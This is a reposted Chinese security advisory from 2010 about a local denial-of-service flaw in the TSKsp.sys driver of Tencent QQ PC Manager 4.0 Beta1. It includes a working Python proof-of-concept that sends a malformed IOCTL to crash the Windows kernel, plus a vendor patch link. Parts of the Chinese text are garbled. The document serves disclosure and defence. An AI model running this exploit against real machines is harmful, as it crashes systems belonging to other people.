当前位置:七道奇文章资讯安全技术网络技术
日期:2010-08-27 00:17:00  来源:本站整理

QQ电脑管家TSKsp.sys驱动本地回绝服务漏洞及修复[网络技术]

赞助商链接



  本文“QQ电脑管家TSKsp.sys驱动本地回绝服务漏洞及修复[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

 影响版本:
Tencent QQ电脑管家 4.0 Beta1漏洞描写:
QQ电脑管家是QQ医生3.3的进级版本,主要功效包含安全防护、系统优化和软件管理.

QQ电脑管家所安装的TSKsp.sys驱动没有精确地考证用户所提交的调用参数,本地用户可以通过提反目意的IOCTL恳求招致内核崩溃.

<*参考
Lufeng Li (lilf@neusoft.com)
*>
测试办法:
 
本站供应程序(办法)大概带有攻击性,仅供安全研究与讲授之用,风险自负!
#!/usr/bin/python

#################################################################
#
# Title: QQ Computer Manager TSKsp.sys Local Denial of Service Exploit
# Author: Lufeng Li of Neusoft Corporation
# Vendor: http://pcmgr.qq.com
# Vulnerable App: http://dl_dir2.qq.com/invc/qqmaster/setup/QQPCMgr_Setup.exe
# Platform: Windows XPSP3 Chinese Simplified
# Tested: QQpcmgr v4.0Beta1
# Vulnerable: QQpcmgr<=v4.0Beta1
#
#################################################################
from ctypes import *

kernel32 = windll.kernel32
Psapi    = windll.Psapi

if __name__ == '__main__':
    GENERIC_READ  = 0x80000000
    GENERIC_WRITE = 0x40000000
    OPEN_EXISTING = 0x3
    CREATE_ALWAYS = 0x2

    DEVICE_NAME   = "\\\\.\\tsksp"
    dwReturn      = c_ulong()
    out_data      = ''
    in_data       = ''
    driver_handle1 = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE,
      0, None, CREATE_ALWAYS, 0, None)
    dev_ioctl = kernel32.DeviceIoControl(driver_handle1, 0x22e01c, in_data,0, out_data, 0,byref(dwReturn), None)

厂商补钉:

Tencent

http://dl_dir2.qq.com/invc/qqpcmgr/setup/QQPCMgr_Setup_40_286.exe


  以上是“QQ电脑管家TSKsp.sys驱动本地回绝服务漏洞及修复[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
  • QQ电脑管家TSKsp.sys驱动本地回绝服务漏洞及修复
  • 本文地址: 与您的QQ/BBS好友分享!
    • 好的评价 如果您觉得此文章好,就请您
        0%(0)
    • 差的评价 如果您觉得此文章差,就请您
        0%(0)

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    Copyright © 2020-2022 www.xiamiku.com. All Rights Reserved .